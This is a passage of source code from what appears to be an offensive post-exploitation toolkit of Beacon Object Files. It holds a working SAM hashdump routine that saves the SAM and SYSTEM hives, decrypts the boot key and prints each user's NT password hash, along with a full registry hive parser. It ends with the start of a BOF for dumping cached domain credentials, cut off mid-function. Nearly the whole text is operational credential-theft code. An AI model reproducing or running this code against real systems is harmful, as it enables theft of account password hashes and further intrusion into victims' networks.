    if (!EnablePrivilege(SE_BACKUP_NAME)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to enable backup privileges. Are you local admin?");
        return;
    }

    if (!EnablePrivilege(SE_RESTORE_NAME)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to enable restore privileges. Are you local admin?");
        return;
    }

    // Backup hives
    HKEY hSystem;
    HKEY hSam;
    res = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM", 0, KEY_READ, &hSystem);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] RegOpenKeyExA failed: %d\n", res);
        return;
    }

    res = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SAM", 0, KEY_READ, &hSam);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] RegOpenKeyExA failed: %d\n", res);
        return;
    }

    // Save the hives to a files
    res = ADVAPI32$RegSaveKeyA(hSystem, systemBackupPath, NULL);
    ADVAPI32$RegCloseKey(hSystem);
    if (res != ERROR_SUCCESS && res != ERROR_ALREADY_EXISTS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] RegSaveKeyW failed: %d\n", res);
        return;
    }

    res = ADVAPI32$RegSaveKeyA(hSam, samBackupPath, NULL);
    ADVAPI32$RegCloseKey(hSam);
    if (res != ERROR_SUCCESS && res != ERROR_ALREADY_EXISTS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] RegSaveKeyW failed: %d\n", res);
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[HASHDUMP] Dumped SAM and SYSTEM");

    // Load backuped SYSTEM key
    res = ADVAPI32$RegLoadKeyA(HKEY_LOCAL_MACHINE, tempSystemKey, systemBackupPath);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] RegLoadKeyA failed: %d\n", res);
        return;
    }

    // Get current control set
    HKEY hSystemBak;
    res = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "BACKUP1", 0, KEY_READ, &hSystemBak);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to open SYSTEM backup key: %d\n", res);
        return;
    }

    DWORD controlSet = GetCurrentControlSet(hSystemBak);
    BeaconPrintf(CALLBACK_OUTPUT, "[HASHDUMP] Found current control set: %d\n", controlSet);
    CHAR lsaPath[MAX_PATH];
    MSVCRT$_snprintf(lsaPath, MAX_PATH, "ControlSet%03d\\Control\\Lsa", controlSet);

    // Extract boot key
    BYTE bootKey[16];
    if (!GetBootKey(hSystemBak, lsaPath, bootKey)) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to extract boot key");
        ADVAPI32$RegCloseKey(hSystemBak);
        return;
    }
    ADVAPI32$RegCloseKey(hSystemBak);

    BeaconPrintf(CALLBACK_OUTPUT, "[HASHDUMP] Bootkey: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
                 bootKey[0], bootKey[1], bootKey[2], bootKey[3],
                 bootKey[4], bootKey[5], bootKey[6], bootKey[7],
                 bootKey[8], bootKey[9], bootKey[10], bootKey[11],
                 bootKey[12], bootKey[13], bootKey[14], bootKey[15]);

    res = ADVAPI32$RegUnLoadKeyA(HKEY_LOCAL_MACHINE, tempSystemKey);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to unload SYSTEM backup key: %d\n", res);
        return;
    }

    // Open SAM file - needed to decrypt BootKey
    FILE *file = MSVCRT$fopen(samBackupPath, "rb");
    if (!file)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to open SAM file");
        return;
    }

    struct BaseBlock base;
    if (MSVCRT$fread(&base, 1, sizeof(base), file) != sizeof(base))
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to read base block");
        MSVCRT$fclose(file);
        return;
    }

    if (MSVCRT$memcmp(base.signature, "regf", 4) != 0)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Invalid registry file");
        MSVCRT$fclose(file);
        return;
    }

    // Read root key
    uint32_t cellSize;
    BYTE *rootCell = readCell(file, base.rootKeyOffset, &cellSize);
    if (!rootCell)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to read root cell");
        MSVCRT$fclose(file);
        return;
    }

    struct NkKey currentKey = parseNkKey(rootCell, cellSize);
    FreeMemory(rootCell);

    if (!currentKey.name)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Root key parse error");
        MSVCRT$fclose(file);
        return;
    }

    // Decrypt boot key

    // Navigate to SAM\Domains\Account
    const char *accountKeyPath[] = {"SAM", "Domains", "Account"};
    struct NkKey accountKey = navigateToPath(file, &currentKey, accountKeyPath, 3);
    freeNkKey(&currentKey);

    if (!accountKey.name)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to navigate to account key");
        MSVCRT$fclose(file);
        return;
    }

    // Read F value
    uint32_t valueCount;
    struct ValueEntry *values = parseValueList(file, accountKey.valueListOffset, accountKey.numValues, &valueCount);
    if (!values)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to parse value list");
        freeNkKey(&accountKey);
        MSVCRT$fclose(file);
        return;
    }

    BYTE *fdata = NULL;
    uint32_t fdataSize = 0;
    for (uint32_t i = 0; i < valueCount; i++)
    {
        if (MSVCRT$strcmp(values[i].name, "F") == 0)
        {
            fdata = readHiveData(file, values[i].dataOffset, values[i].dataSize, &fdataSize);
            break;
        }
    }

    freeValueEntry(values);
    freeNkKey(&accountKey);

    if (!fdata)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to read F");
        MSVCRT$fclose(file);
        return;
    }

    // Extract keys1
    if (fdataSize < 0xa8 + 4)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] F too small");
        FreeMemory(fdata);
        MSVCRT$fclose(file);
        return;
    }

    BYTE *keys1 = fdata + 0x68 + 4;
    if (keys1[0] != 0x02)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] This version of Windows is currently unsupported");
        FreeMemory(fdata);
        MSVCRT$fclose(file);
        return;
    }

    // Extract AES data
    BYTE *aes_iv = keys1 + 0x10;
    BYTE *aes_data = keys1 + 0x20;

    // Decrypt the boot key
    BYTE *decryptedBootKey = NULL;
    DWORD decryptedBootKeyLen = 0;
    if (!DecryptAES_CBC(bootKey, 16, aes_iv, 16, aes_data, 16, &decryptedBootKey, &decryptedBootKeyLen))
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to decrypt Bootkey");
        FreeMemory(fdata);
        MSVCRT$fclose(file);
        return;
    }

    FreeMemory(fdata);

    BeaconPrintf(CALLBACK_OUTPUT, "[HASHDUMP] Decrypted bootkey: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
                 decryptedBootKey[0], decryptedBootKey[1], decryptedBootKey[2], decryptedBootKey[3],
                 decryptedBootKey[4], decryptedBootKey[5], decryptedBootKey[6], decryptedBootKey[7],
                 decryptedBootKey[8], decryptedBootKey[9], decryptedBootKey[10], decryptedBootKey[11],
                 decryptedBootKey[12], decryptedBootKey[13], decryptedBootKey[14], decryptedBootKey[15]);

    // Navigate to SAM\Domains\Account\Users
    const char *usersKeyPath[] = {"SAM", "Domains", "Account", "Users"};
    struct NkKey usersKey = navigateToPath(file, &currentKey, usersKeyPath, 4);

    uint32_t offsetCount;
    uint32_t *userOffsets = getSubkeyOffsets(file, usersKey.subkeyListOffset, &offsetCount);
    if (!userOffsets)
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Failed to get user offsets\n");
        FreeMemory(decryptedBootKey);
        freeNkKey(&usersKey);
        MSVCRT$fclose(file);
        return;
    }

    wchar_t *outputBuffer = (wchar_t *)AllocateMemory((offsetCount * 128) * sizeof(wchar_t)); // Size is only approximate, maybe fix it. However, 128 is big enough
    MSVCRT$memset(outputBuffer, 0,(offsetCount * 128) * sizeof(wchar_t));
    int bufferSize = 0;

    for (uint32_t i = 0; i < offsetCount; i++)
    {
        uint32_t cellSize;
        BYTE *cellData = readCell(file, userOffsets[i], &cellSize);
        if (!cellData)
            continue;

        struct NkKey userKey = parseNkKey(cellData, cellSize);
        FreeMemory(cellData);

        if (!userKey.name || MSVCRT$strcmp(userKey.name, "Names") == 0)
        {
            freeNkKey(&userKey);
            continue;
        }

        uint32_t rid = MSVCRT$strtoul(userKey.name, NULL, 16);

        struct ValueEntry *values = parseValueList(file, userKey.valueListOffset, userKey.numValues, &valueCount);
        if (!values)
        {
            freeNkKey(&userKey);
            continue;
        }

        // Extract F and V
        BYTE *vdata = NULL;
        uint32_t vdataSize = 0;
        BYTE *fdata = NULL;
        uint32_t fdataSize = 0;

        for (uint32_t j = 0; j < valueCount; j++)
        {
            if (MSVCRT$strcmp(values[j].name, "V") == 0)
                vdata = readHiveData(file, values[j].dataOffset, values[j].dataSize, &vdataSize);
            else if (MSVCRT$strcmp(values[j].name, "F") == 0)
                fdata = readHiveData(file, values[j].dataOffset, values[j].dataSize, &fdataSize);
        }

        freeValueEntry(values);
        freeNkKey(&userKey);

        if (!vdata || !fdata) {
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }

        // Read username
        if (vdataSize <= 0xc + 4 + 4) {
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }

        uint32_t usernameOffset = *(const int32_t *)(vdata + 0xc + 4) + 0xcc;
        uint32_t usernameLength = *(const int32_t *)(vdata + 0xc + 4 + 4);

        if (vdataSize <= usernameOffset + 4 + usernameLength)
        {
            BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Username offset is more than data size %u\n", usernameOffset);
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }

        // TODO !!! Crashes on cyrillic usernames + Client is not rendering WCHARS correctly - check and fix
        wchar_t *username = (wchar_t *)AllocateMemory(usernameLength + sizeof(wchar_t)); // wchar because cyrillic and other usernames
        if (!username)
        {
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }

        MSVCRT$memcpy(username, vdata + usernameOffset + 4, usernameLength);
        username[usernameLength / sizeof(wchar_t)] = L'\0';

        // Read hash
        if (vdataSize <= 0xa8 + 4 + 4)
        {
            FreeMemory(username);
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }

        uint32_t ntOffset = *(const int32_t *)(vdata + 0xa8 + 4) + 0xcc;
        uint32_t hashLength = *(const int32_t *)(vdata + 0xa8 + 4 + 4);

        if (vdataSize <= ntOffset + 4 + hashLength)
        {
            FreeMemory(username);
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }
        if (hashLength <= 0x18)
        {
            // Empty hash - TODO lookup how secretsdump handles this guys
            wchar_t *partBuffer = (wchar_t *)AllocateMemory(12 * sizeof(wchar_t));
            if (partBuffer == NULL)
            {
                BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Could not allocate buffer");
                FreeMemory(username);
                FreeMemory(vdata);
                FreeMemory(fdata);
                continue;
            }
            MSVCRT$memset(partBuffer, 0, 128 * sizeof(wchar_t));

            int partSize = MSVCRT$sprintf(partBuffer, "%ls:%d:<empty>\n", username, rid);

            MSVCRT$wcscat_s(outputBuffer, offsetCount * 128, partBuffer);
            bufferSize += partSize;

            FreeMemory(username);
            FreeMemory(vdata);
            FreeMemory(fdata);
            continue;
        }

        BYTE *hash_data = vdata + ntOffset + 4;
        BOOL isAes = hash_data[2] == 2;

        if (isAes)
        {
            // Extract salt (IV)
            BYTE *aes_iv = hash_data + 0x8;
            BYTE *aes_data = hash_data + 0x18;

            // Decrypt with AES
            BYTE *encrypted_hash = NULL;
            DWORD encrypted_hash_len = 0;
            if (DecryptAES_CBC(decryptedBootKey, 16, aes_iv, 16, aes_data, 16, &encrypted_hash, &encrypted_hash_len))
            {
                // RID to key(s)
                BYTE s1[7];
                BYTE s2[7];

                s1[0] = rid & 0xff;
                s1[1] = (rid >> 8) & 0xff;
                s1[2] = (rid >> 16) & 0xff;
                s1[3] = (rid >> 24) & 0xff;
                s1[4] = s1[0];
                s1[5] = s1[1];
                s1[6] = s1[2];

                s2[0] = s1[3];
                s2[1] = s1[0];
                s2[2] = s1[1];
                s2[3] = s1[2];
                s2[4] = s2[0];
                s2[5] = s2[1];
                s2[6] = s2[2];

                BYTE k1[8];
                BYTE k2[8];

                k1[0] = ODD_PARITY[(s1[0] >> 1) << 1];
                k1[1] = ODD_PARITY[(((s1[0] & 0x01) << 6) | (s1[1] >> 2)) << 1];
                k1[2] = ODD_PARITY[(((s1[1] & 0x03) << 5) | (s1[2] >> 3)) << 1];
                k1[3] = ODD_PARITY[(((s1[2] & 0x07) << 4) | (s1[3] >> 4)) << 1];
                k1[4] = ODD_PARITY[(((s1[3] & 0x0F) << 3) | (s1[4] >> 5)) << 1];
                k1[5] = ODD_PARITY[(((s1[4] & 0x1F) << 2) | (s1[5] >> 6)) << 1];
                k1[6] = ODD_PARITY[(((s1[5] & 0x3F) << 1) | (s1[6] >> 7)) << 1];
                k1[7] = ODD_PARITY[(s1[6] & 0x7F) << 1];

                k2[0] = ODD_PARITY[(s2[0] >> 1) << 1];
                k2[1] = ODD_PARITY[(((s2[0] & 0x01) << 6) | (s2[1] >> 2)) << 1];
                k2[2] = ODD_PARITY[(((s2[1] & 0x03) << 5) | (s2[2] >> 3)) << 1];
                k2[3] = ODD_PARITY[(((s2[2] & 0x07) << 4) | (s2[3] >> 4)) << 1];
                k2[4] = ODD_PARITY[(((s2[3] & 0x0F) << 3) | (s2[4] >> 5)) << 1];
                k2[5] = ODD_PARITY[(((s2[4] & 0x1F) << 2) | (s2[5] >> 6)) << 1];
                k2[6] = ODD_PARITY[(((s2[5] & 0x3F) << 1) | (s2[6] >> 7)) << 1];
                k2[7] = ODD_PARITY[(s2[6] & 0x7F) << 1];

                // Decrypt with DES now
                BYTE decrypted_hash[16];

                DecryptDES(k1, encrypted_hash, decrypted_hash);
                DecryptDES(k2, encrypted_hash + 8, decrypted_hash + 0x8);

                wchar_t *partBuffer = (wchar_t *)AllocateMemory(128 * sizeof(wchar_t));
                if (partBuffer == NULL)
                {
                    BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Could not allocate buffer");
                    FreeMemory(encrypted_hash);
                    continue;
                }
                MSVCRT$memset(partBuffer, 0, 128 * sizeof(wchar_t));

                int partSize = MSVCRT$sprintf(partBuffer, "%ls:%d:%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x\n", username, rid,
                                              decrypted_hash[0], decrypted_hash[1], decrypted_hash[2], decrypted_hash[3],
                                              decrypted_hash[4], decrypted_hash[5], decrypted_hash[6], decrypted_hash[7],
                                              decrypted_hash[8], decrypted_hash[9], decrypted_hash[10], decrypted_hash[11],
                                              decrypted_hash[12], decrypted_hash[13], decrypted_hash[14], decrypted_hash[15]);

                if (partSize != -1) {
                    BeaconOutput(CALLBACK_OUTPUT, partBuffer, partSize);
                    FreeMemory(partBuffer);
               }

                FreeMemory(encrypted_hash);
            }
        }

        FreeMemory(username);
        FreeMemory(vdata);
        FreeMemory(fdata);
    }


    MSVCRT$fclose(file);
    CleanupBackupPaths();
}


================================================
FILE: Creds-BOF/hashdump/hive_parser.c
================================================
#include <stdint.h>
#include <tchar.h>
#include "bofdefs.h"
#include "beacon.h"

#define CALLBACK_ERROR       0x0d

#pragma pack(push, 1)
struct BaseBlock
{
    char signature[4];
    uint32_t primarySequence;
    uint32_t secondarySequence;
    uint64_t lastModified;
    uint32_t majorVersion;
    uint32_t minorVersion;
    uint32_t fileType;
    uint32_t fileFormat;
    uint32_t rootKeyOffset;
    uint32_t hiveSize;
    uint32_t clusteringFactor;
    char reserved[64];
};
#pragma pack(pop)

struct NkKey
{
    char *name;
    uint32_t numSubkeys;
    uint32_t subkeyListOffset;
    uint32_t numValues;
    uint32_t valueListOffset;
};

struct LfList
{
    uint32_t *subkeyOffsets;
    uint16_t count;
};

struct LiList
{
    uint32_t *subkeyOffsets;
    uint16_t count;
};

struct LhList
{
    uint32_t *subkeyOffsets;
    uint16_t count;
};

struct ValueEntry
{
    char *name;
    uint32_t dataSize;
    uint32_t dataOffset;
};

// Memory management functions - maybe move this to some separate file
LPVOID AllocateMemory(SIZE_T size);
void FreeMemory(LPVOID ptr);
LPVOID ReallocateMemory(LPVOID ptr, SIZE_T size);

// Read raw data from hive (without parsing size from first 4 bytes)
BYTE *readHiveData(FILE *file, uint32_t offset, uint32_t size, uint32_t *outSize);

// Read cell from hive. Reads 4 bytes as size and other part as data
BYTE *readCell(FILE *file, uint32_t offset, uint32_t *outSize);

// Read value list entries
uint32_t *readValueList(FILE *file, uint32_t offset, uint32_t numValues, uint32_t *outCount);

// Some parsers
struct ValueEntry parseValueEntry(const BYTE *data, uint32_t dataSize);
struct NkKey parseNkKey(const BYTE *data, uint32_t dataSize);
struct LfList parseLfList(const BYTE *data, uint32_t dataSize);
struct LiList parseLiList(const BYTE *data, uint32_t dataSize);
struct LhList parseLhList(const BYTE *data, uint32_t dataSize);

// Get subkey offsets from list
uint32_t *getSubkeyOffsets(FILE *file, uint32_t subkeyListOffset, uint32_t *outCount);

// Navigate to path in registry
struct NkKey navigateToPath(FILE *file, struct NkKey *currentKey, const char **path, uint32_t pathCount);

// Parse value list entries
struct ValueEntry *parseValueList(FILE *file, uint32_t valueListOffset, uint32_t numValues, uint32_t *outCount);

// Free memory allocated by the parser
void freeNkKey(struct NkKey *key);
void freeValueEntry(struct ValueEntry *entry);
void freeLfList(struct LfList *list);
void freeLiList(struct LiList *list);
void freeLhList(struct LhList *list);

LPVOID AllocateMemory(SIZE_T size)
{
    return KERNEL32$VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
}

void FreeMemory(LPVOID ptr)
{
    if (ptr)
    {
        KERNEL32$VirtualFree(ptr, 0, MEM_RELEASE);
    }
}

LPVOID ReallocateMemory(LPVOID ptr, SIZE_T size)
{
    if (!ptr)
    {
        return AllocateMemory(size);
    }

    LPVOID newPtr = AllocateMemory(size);
    if (!newPtr)
    {
        return NULL;
    }

    // Get the size of the old allocation
    MEMORY_BASIC_INFORMATION mbi;
    if (KERNEL32$VirtualQuery(ptr, &mbi, sizeof(mbi)))
    {
        SIZE_T oldSize = mbi.RegionSize;
        SIZE_T copySize = (oldSize < size) ? oldSize : size;
        MSVCRT$memcpy(newPtr, ptr, copySize);
    }

    FreeMemory(ptr);
    return newPtr;
}

// Helper function to read data from file
static BOOL readFileData(FILE *file, uint32_t offset, void *buffer, uint32_t size)
{
    if (MSVCRT$fseek(file, 4096 + offset, SEEK_SET) != 0)
    {
        return FALSE;
    }
    return MSVCRT$fread(buffer, 1, size, file) == size;
}

BYTE *readHiveData(FILE *file, uint32_t offset, uint32_t size, uint32_t *outSize)
{
    BYTE *data = (BYTE *)AllocateMemory(size);
    if (!data)
    {
        *outSize = 0;
        return NULL;
    }

    if (!readFileData(file, offset, data, size))
    {
        FreeMemory(data);
        *outSize = 0;
        return NULL;
    }

    *outSize = size;
    return data;
}

BYTE *readCell(FILE *file, uint32_t offset, uint32_t *outSize)
{
    int32_t cellSize;
    if (!readFileData(file, offset, &cellSize, sizeof(cellSize)))
    {
        *outSize = 0;
        return NULL;
    }

    cellSize = abs(cellSize); // The size is negative if cell is unallocated
    BYTE *data = (BYTE *)AllocateMemory(cellSize - sizeof(cellSize));
    if (!data)
    {
        *outSize = 0;
        return NULL;
    }

    if (!readFileData(file, offset + sizeof(cellSize), data, cellSize - sizeof(cellSize)))
    {
        FreeMemory(data);
        *outSize = 0;
        return NULL;
    }

    *outSize = cellSize - sizeof(cellSize);
    return data;
}

uint32_t *readValueList(FILE *file, uint32_t offset, uint32_t numValues, uint32_t *outCount)
{
    int32_t cellSize;
    if (!readFileData(file, offset, &cellSize, sizeof(cellSize)))
    {
        *outCount = 0;
        return NULL;
    }

    uint32_t *valueOffsets = (uint32_t *)AllocateMemory(numValues * sizeof(uint32_t));
    if (!valueOffsets)
    {
        *outCount = 0;
        return NULL;
    }

    if (!readFileData(file, offset + sizeof(cellSize), valueOffsets, numValues * sizeof(uint32_t)))
    {
        FreeMemory(valueOffsets);
        *outCount = 0;
        return NULL;
    }

    *outCount = numValues;
    return valueOffsets;
}

struct ValueEntry parseValueEntry(const BYTE *data, uint32_t dataSize)
{
    struct ValueEntry entry = {0};
    if (dataSize < 2 || data[0] != 'v' || data[1] != 'k')
    {
        return entry;
    }

    uint16_t nameLength = *(const uint16_t *)(data + 2);
    if (2 + nameLength > dataSize)
    {
        return entry;
    }

    entry.name = (char *)AllocateMemory(nameLength + 1);
    if (!entry.name)
    {
        return entry;
    }
    MSVCRT$memcpy(entry.name, data + 20, nameLength);
    entry.name[nameLength] = '\0';

    entry.dataSize = *(const int32_t *)(data + 4);
    entry.dataOffset = *(const int32_t *)(data + 8);

    return entry;
}

struct NkKey parseNkKey(const BYTE *data, uint32_t dataSize)
{
    struct NkKey key = {0};
    if (dataSize < 0x46 || data[0] != 'n' || data[1] != 'k')
    {
        return key;
    }

    uint16_t nameLength = *(const uint16_t *)(data + 72);
    if (72 + nameLength > dataSize)
    {
        return key;
    }

    key.name = (char *)AllocateMemory(nameLength + 1);
    if (!key.name)
    {
        return key;
    }
    MSVCRT$memcpy(key.name, data + 76, nameLength);
    key.name[nameLength] = '\0';

    key.numSubkeys = *(const uint32_t *)(data + 20);
    key.subkeyListOffset = *(const uint32_t *)(data + 28);
    key.numValues = *(const uint32_t *)(data + 36);
    key.valueListOffset = *(const uint32_t *)(data + 40);

    return key;
}

struct LfList parseLfList(const BYTE *data, uint32_t dataSize)
{
    struct LfList list = {0};
    if (dataSize < 4 || data[0] != 'l' || data[1] != 'f')
    {
        return list;
    }

    list.count = *(const uint16_t *)(data + 2);
    list.subkeyOffsets = (uint32_t *)AllocateMemory(list.count * sizeof(uint32_t));
    if (!list.subkeyOffsets)
    {
        list.count = 0;
        return list;
    }

    for (uint16_t i = 0; i < list.count; ++i)
    {
        if (dataSize < 4 + (i + 1) * 8)
        {
            FreeMemory(list.subkeyOffsets);
            list.subkeyOffsets = NULL;
            list.count = 0;
            return list;
        }
        list.subkeyOffsets[i] = *(const uint32_t *)(data + 4 + i * 8);
    }

    return list;
}

struct LiList parseLiList(const BYTE *data, uint32_t dataSize)
{
    struct LiList list = {0};
    if (dataSize < 4 || data[0] != 'l' || data[1] != 'i')
    {
        return list;
    }

    list.count = *(const uint16_t *)(data + 2);
    list.subkeyOffsets = (uint32_t *)AllocateMemory(list.count * sizeof(uint32_t));
    if (!list.subkeyOffsets)
    {
        list.count = 0;
        return list;
    }

    for (uint16_t i = 0; i < list.count; ++i)
    {
        if (dataSize < 4 + (i + 1) * 4)
        {
            FreeMemory(list.subkeyOffsets);
            list.subkeyOffsets = NULL;
            list.count = 0;
            return list;
        }
        list.subkeyOffsets[i] = *(const uint32_t *)(data + 4 + i * 4);
    }

    return list;
}

struct LhList parseLhList(const BYTE *data, uint32_t dataSize)
{
    struct LhList list = {0};
    if (dataSize < 4 || data[0] != 'l' || data[1] != 'h')
    {
        return list;
    }

    list.count = *(const uint16_t *)(data + 2);
    list.subkeyOffsets = (uint32_t *)AllocateMemory(list.count * sizeof(uint32_t));
    if (!list.subkeyOffsets)
    {
        list.count = 0;
        return list;
    }

    for (uint16_t i = 0; i < list.count; ++i)
    {
        if (dataSize < 4 + (i + 1) * 8)
        {
            FreeMemory(list.subkeyOffsets);
            list.subkeyOffsets = NULL;
            list.count = 0;
            return list;
        }
        list.subkeyOffsets[i] = *(const uint32_t *)(data + 4 + i * 8);
    }

    return list;
}

uint32_t *getSubkeyOffsets(FILE *file, uint32_t subkeyListOffset, uint32_t *outCount)
{
    uint32_t cellSize;
    BYTE *listCell = readCell(file, subkeyListOffset, &cellSize);
    if (!listCell)
    {
        *outCount = 0;
        return NULL;
    }

    uint32_t *offsets = NULL;
    *outCount = 0;

    if (listCell[0] == 'l' && listCell[1] == 'f')
    {
        struct LfList list = parseLfList(listCell, cellSize);
        offsets = list.subkeyOffsets;
        *outCount = list.count;
    }
    else if (listCell[0] == 'l' && listCell[1] == 'i')
    {
        struct LiList list = parseLiList(listCell, cellSize);
        offsets = list.subkeyOffsets;
        *outCount = list.count;
    }
    else if (listCell[0] == 'l' && listCell[1] == 'h')
    {
        struct LhList list = parseLhList(listCell, cellSize);
        offsets = list.subkeyOffsets;
        *outCount = list.count;
    }
    else
    {
        BeaconPrintf(CALLBACK_ERROR, "[HASHDUMP] Unsupported list type\n");
    }

    FreeMemory(listCell);
    return offsets;
}

struct NkKey navigateToPath(FILE *file, struct NkKey *currentKey, const char **path, uint32_t pathCount)
{
    struct NkKey navigatedKey = *currentKey;

    for (uint32_t i = 0; i < pathCount; i++)
    {
        uint32_t offsetCount;
        uint32_t *offsets = getSubkeyOffsets(file, navigatedKey.subkeyListOffset, &offsetCount);
        if (!offsets)
        {
            return navigatedKey;
        }

        BOOL found = FALSE;
        for (uint32_t j = 0; j < offsetCount; j++)
        {
            uint32_t cellSize;
            BYTE *cellData = readCell(file, offsets[j], &cellSize);
            if (!cellData)
                continue;

            struct NkKey subkey = parseNkKey(cellData, cellSize);
            FreeMemory(cellData);

            if (subkey.name && MSVCRT$strcmp(subkey.name, path[i]) == 0)
            {
                freeNkKey(&navigatedKey);
                navigatedKey = subkey;
                found = TRUE;
                break;
            }
            freeNkKey(&subkey);
        }

        FreeMemory(offsets);
        if (!found)
        {
            // Path component missing
            return navigatedKey;
        }
    }

    return navigatedKey;
}

struct ValueEntry *parseValueList(FILE *file, uint32_t valueListOffset, uint32_t numValues, uint32_t *outCount)
{
    uint32_t valueCount;
    uint32_t *valueOffsets = readValueList(file, valueListOffset, numValues, &valueCount);
    if (!valueOffsets || valueCount == 0)
    {
        *outCount = 0;
        return NULL;
    }

    struct ValueEntry *entries = (struct ValueEntry *)AllocateMemory(valueCount * sizeof(struct ValueEntry));
    if (!entries)
    {
        FreeMemory(valueOffsets);
        *outCount = 0;
        return NULL;
    }

    for (uint32_t i = 0; i < valueCount; i++)
    {
        uint32_t cellSize;
        BYTE *data = readCell(file, valueOffsets[i], &cellSize);
        if (!data)
        {
            entries[i] = (struct ValueEntry){0};
            continue;
        }

        entries[i] = parseValueEntry(data, cellSize);
        FreeMemory(data);
    }

    FreeMemory(valueOffsets);
    *outCount = valueCount;
    return entries;
}

void freeNkKey(struct NkKey *key)
{
    if (key && key->name)
    {
        FreeMemory(key->name);
        key->name = NULL;
    }
}

void freeValueEntry(struct ValueEntry *entry)
{
    if (entry && entry->name)
    {
        FreeMemory(entry->name);
        entry->name = NULL;
    }
}

void freeLfList(struct LfList *list)
{
    if (list && list->subkeyOffsets)
    {
        FreeMemory(list->subkeyOffsets);
        list->subkeyOffsets = NULL;
    }
}

void freeLiList(struct LiList *list)
{
    if (list && list->subkeyOffsets)
    {
        FreeMemory(list->subkeyOffsets);
        list->subkeyOffsets = NULL;
    }
}

void freeLhList(struct LhList *list)
{
    if (list && list->subkeyOffsets)
    {
        FreeMemory(list->subkeyOffsets);
        list->subkeyOffsets = NULL;
    }
}

================================================
FILE: Creds-BOF/lsadump/cache.c
================================================
/*
 * lsadump_cache BOF by shashinma
 * Dumps cached domain credentials (DCC2/MSCacheV2)
 * Requires SYSTEM privileges
 */

#include "include/cache.h"
#include "lsadump_helper.c"

// ============================================================================
// Crypto: AES-128 CTS Decryption (Cipher-text Stealing)
// ============================================================================

static HCRYPTKEY CreateAES128Key(HCRYPTPROV hProv, const BYTE* key, DWORD mode) {
    AES128_KEY_BLOB keyBlob;
    HCRYPTKEY hKey = 0;

    keyBlob.header.bType = PLAINTEXTKEYBLOB;
    keyBlob.header.bVersion = CUR_BLOB_VERSION;
    keyBlob.header.reserved = 0;
    keyBlob.header.aiKeyAlg = CALG_AES_128;
    keyBlob.keySize = AES_128_KEY_SIZE;
    MSVCRT$memcpy(keyBlob.key, key, AES_128_KEY_SIZE);

    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey))
        return 0;

    ADVAPI32$CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0);
    return hKey;
}

static BOOL DecryptAES128_CTS(HCRYPTPROV hProv, const BYTE* key, const BYTE* iv,
                               const BYTE* encrypted, DWORD encLen, BYTE* decrypted) {
    HCRYPTKEY hKeyCBC = 0, hKeyECB = 0;
    DWORD numBlocks, i;
    BYTE block[16], prevCipher[16], tmp[16];
    DWORD blockLen;

    if (encLen < 16) return FALSE;

    numBlocks = (encLen + 15) / 16;
    MSVCRT$memcpy(prevCipher, iv, 16);

    hKeyCBC = CreateAES128Key(hProv, key, CRYPT_MODE_CBC);
    if (!hKeyCBC) return FALSE;
    ADVAPI32$CryptSetKeyParam(hKeyCBC, KP_IV, (BYTE*)iv, 0);

    if (numBlocks <= 1) {
        MSVCRT$memcpy(decrypted, encrypted, encLen);
        blockLen = 16;
        ADVAPI32$CryptDecrypt(hKeyCBC, 0, FALSE, 0, decrypted, &blockLen);
        ADVAPI32$CryptDestroyKey(hKeyCBC);
        return TRUE;
    }

    for (i = 0; i < numBlocks - 2; i++) {
        MSVCRT$memcpy(block, encrypted + i * 16, 16);
        MSVCRT$memcpy(tmp, block, 16);
        blockLen = 16;
        if (!ADVAPI32$CryptDecrypt(hKeyCBC, 0, FALSE, 0, block, &blockLen)) {
